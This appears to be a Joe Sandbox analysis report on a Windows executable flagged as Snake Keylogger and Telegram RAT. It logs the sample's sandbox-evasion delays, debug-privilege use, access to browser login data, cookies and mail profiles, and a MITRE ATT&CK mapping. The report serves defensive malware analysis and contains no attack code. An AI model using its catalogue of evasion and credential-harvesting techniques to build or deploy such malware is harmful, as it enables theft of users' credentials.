Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	API/Special instruction interceptor: Address: 63A0FDF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	API/Special instruction interceptor: Address: 4860FDF

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Memory allocated: 75B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Memory allocated: 37FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Memory allocated: 37D70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4A12.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

API coverage: 2.1 %

Source: C:\Users\user\Desktop\4kobC6KGC3.exe TID: 5840	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe TID: 5840	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_004065C7 FindFirstFileW,FindClose,	2_2_004065C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405996

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPj
Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079D5000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	API call chain: ExitProcess graph end node			graph_0-4889
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	API call chain: ExitProcess graph end node			graph_0-4883

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: 0_2_70471B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70471B5F

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Process created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"

Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Users\user\Desktop\4kobC6KGC3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403359

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	115 System Information Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4kobC6KGC3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
4kobC6KGC3.exe